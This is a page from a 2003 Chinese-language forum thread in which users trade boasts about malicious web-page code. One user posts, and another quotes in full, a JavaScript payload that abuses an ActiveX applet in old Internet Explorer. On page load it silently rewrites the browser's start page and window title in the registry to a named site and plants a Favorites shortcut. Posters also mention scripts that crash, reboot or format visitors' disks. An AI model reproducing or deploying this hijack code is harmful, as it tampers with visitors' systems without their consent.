闪舞元素 发表于 2003-2-1 01:23:00

不说给你看的了~~~~
你这样的QTFJ是不会懂的~~~

BB-COOL 发表于 2003-2-1 01:24:00

我知啊

得你呢种QTFJ先会睇啊

渣王 发表于 2003-2-1 01:50:00

你叫谁啊,朱玉光?

你识点样用JAVA修改注册表咩?哼

学友 发表于 2003-2-1 11:28:00

咪系!

BB-COOL 发表于 2003-2-1 12:02:00

以下是引用渣王在2003-2-1 1:50:24的发言:
你叫谁啊,朱玉光?

你识点样用JAVA修改注册表咩?哼

讲咩啊???


[此贴子已经被作者于2003-2-1 12:02:51编辑过]

饼干 发表于 2003-2-1 12:35:00

以下是引用渣王在2003-2-1 1:15:00的发言:
这种死人恶意代码,我初一的时候已经会自己编啦

教大家怎么破除,如果你进去后,不断弹出提示框,你不用理他
只要按下Ctrl+Alt+Del三个键,然后将该浏览器结束任务就行了

还有更厉害的呢,一进入就会重启,或者死机,大家想知道,我可以公开代码

知你叻,知你劲,我就想放上来俾人玩下之嘛
你使唔使喺拆我台啊?

闪舞元素 发表于 2003-2-1 13:20:00

以下是引用渣王在2003-2-1 1:50:24的发言:
你叫谁啊,朱玉光?

你识点样用JAVA修改注册表咩?哼


<SCRIPT language="JavaScript">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
a1=document.applets;
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf("Chg") == -1)
{
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"   
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://flashelement.126.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Snow Manor");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, "Snow Manor", "http://flashelement.126.com");
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>


java与javascript是两回事哦~~~~~
偶还有利用JS format硬盘的~~~


[此贴子已经被作者于2003-2-1 13:24:27编辑过]

明知故犯 发表于 2003-2-1 13:31:00

睇完有少少头晕,还有点想呕。。。莫非我有咗???

渣王 发表于 2003-2-1 15:12:00



<SCRIPT language=&quot;JavaScript&quot;>
document.write(&quot;<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>&quot;);
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + &quot;\\&quot; + DispName +&quot;.URL&quot;);
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
a1=document.applets;
a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;);
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;);
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;);
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf(&quot;Chg&quot;) == -1)
{
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot;   
Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page&quot;, &quot;http://flashelement.126.com&quot;);
Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title&quot;, &quot;Snow Manor&quot;);
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot;
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + &quot;\\Favorites&quot;;
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + &quot;\\Documents and Settings\\&quot; + Net.UserName + &quot;\\Favorites&quot;;
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, &quot;Snow Manor&quot;, &quot;http://flashelement.126.com&quot;);
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout(&quot;f()&quot;, 1000);
}
init();
</script>


java与javascript是两回事哦~~~~~
偶还有利用JS format硬盘的~~~


[此贴子已经被作者于2003-2-1 13:24:27编辑过]


一看就知道是抄的!还留有几个超连接在上面,呵呵
格式化硬盘的,我也见过啊!

痴王 发表于 2003-2-1 15:54:00

渣王,有人抢你版的生意哦!
页: 1 [2] 3 4
查看完整版本: 快啲入来,唔睇唔好后悔啊